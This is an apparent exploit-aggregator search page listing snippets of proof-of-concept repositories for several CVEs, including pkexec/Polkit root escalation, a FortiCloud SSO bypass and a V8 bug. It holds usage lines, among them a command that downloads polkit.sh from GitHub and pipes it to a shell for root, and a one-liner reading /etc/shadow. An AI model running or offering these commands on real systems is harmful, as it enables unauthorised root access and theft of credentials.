12884 matches found
cve-2026-24858
CVE-2026-24858 PoC helper CVE-2026-24858 - Administrative FortiCloud SSO authentication bypass This repository contains a conservative Python helper for scanning Fortinet web management indicators and an optional explicit payload sender. The exploit/payload sender is disabled by default and...
CVE-2026-31431
CVE-2026-31431 POC for CVE-2026-31431 Script The script is a small 10-lines POC that allows any user to become root on a machine...
pkexec-lpe-poc
pkexec-lpe-poc POC for CVE-2021-4034 Original Writeup For ease of use, it accepts a C file payload instead of a hardcoded shell. usage: root@kitploit: make ./poc payload.c tested on Ubuntu 20.04.3 LTS - Linux target 5.4.0-81-generic...
CVE-2021-30955-POC
CVE-2021-30955 POC Proof of concept wrapped into an iOS app for CVE-2021-30955 All credit to Jake James. His POC code used in this project can be found here. What is this? This demonstrates CVE-2021-30955, an iOS bug which allows an app in userspace to gain kernel-level permissions. In order to...
CVE-2021-4034
CVE-2021-4034 This is an exploit created for CVE-2021-4034 meant as a POC. It is based off the info at https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt. How to use it: Download the exploit folder. Compile prog.c with gcc prog.c Go to the GCONVPATH=. folder and ensure that the "code" fil...
CVE-2026-26801-pdfmake-ssrf
pdfmake SSRF Vulnerability PoC Vulnerability Summary...
CVE-2021-4034
CVE-2021-4034 https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt Build To compile, just use make Note : CentOS 8 Stream doesn't have dev tools. Install them with: dnf groupinstall 'Development Tools' Usage Execute ./cve-2021-4034 If your distro is vulnerable you will get root!...
CVE-2023-51385
CVE-2023-51385 CVE-2023-51385 PoC Exploit...
CVE--2026-24061
CVE-2026-24061 CVE-2026-24061 nlss/xinetd docker inetutils JayGLXR CVE-2026-24061 PoC...
CVE-2026-5000
CVE-2026-5000 Important infromation This CVE has been approved by the CVE.org as well as the NVD. Please refer the following links of the reference. CVE.org - https://vulners.com/cve/CVE-2026-5000 NVD - https://nvd.nist.gov/vuln/detail/CVE-2026-5000 CVE-2026-5000 Windows Defender Vulnerability Po...
CVE-2021-3560
CVE-2021-3560 Polkit Instant Root Exploit You can run one command to root with Polkit CVE-2021-3560 vulnerable boxes by typing in: sh -c "$curl -sSL https://raw.githubusercontent.com/n3onhacks/CVE-2021-3560/main/polkit.sh" Or you can download the .sh or copy and paste it. Run and Instant Root. Us...
Demo_CVE-2025-3248
DemoCVE-2025-3248 — Educational PoC Purpose: Simulate the vulnerability CVE-2025-3248 in an isolated environment for information security learning: build a lab, observe exploitable behavior, and discuss mitigation measures. ⚠️ LEGAL & ETHICAL DISCLAIMER ETHICAL USE ONLY All content in this...
CVE-2021-42237
CVE-2021-42237 This is an exploit/PoC for CVE-2021-42237 taken from: This Assetnote report DISCLAIMER: I'm not associated with Assetnote in any way or form. This content is provided for educational porpouses only. Make sure to replace CMD-COMMAND-HERE, as well as the Host, from the PoC below:...
Compiled-PoC-Binary-For-CVE-2023-28252
Compiled PoC Binary For CVE-2023-28252 The repo contains a precompiled binary which can be run on a Windows machine vulnerable to CVE-2023-28252 The precompiled binary is a slightly modified version of the PoC exploit seen in fortra's repo. The file can be run with the following arguments:...
CVE-2026-24134-PoC
CVE-2026-24134-PoC Overview This repository contains the Proof of Concept PoC for CVE-2026-24134 , a Broken Object Level Authorization BOLA vulnerability in StudioCMS. Contents cve202624134poc.py - Python exploitation script Prerequisites StudioCMS=0.1.1 root@kitploit: pip install requests...
CVE-2021-4034-NoGCC
CVE-2021-4032-NoGCC Test in: Ubuntu 20.04.3 LTS Kali 2021.4a CentOS Linux release 7.5.1804 Use: 1:interactive shell ./cve-2021-4034-poc-x64 2:one-liner ./cve-2021-4034-poc-x64 "cat /etc/shadow"...
CVE-2023-51764
CVE-2023-51764 CVE-2023-51764 poc Link: https://github.com/duy-31/CVE-2023-51764 1. Add SMTP authentication 2. The script has only been tested on Kali 3. Please do not use the script for illegal purposes...
v8-poc-CVE-2026-5865
Minimal .js PoC for v8 CVE-2026-5865 Quick Run Install deps: root@kitploit: pip install -r requirements.txt Patch/calibrate exploit: root@kitploit: python3 patchexploit.py /path/to/d8 exploit.js Run exploit: root@kitploit: ./run-exploit.sh /path/to/d8 exploit.js...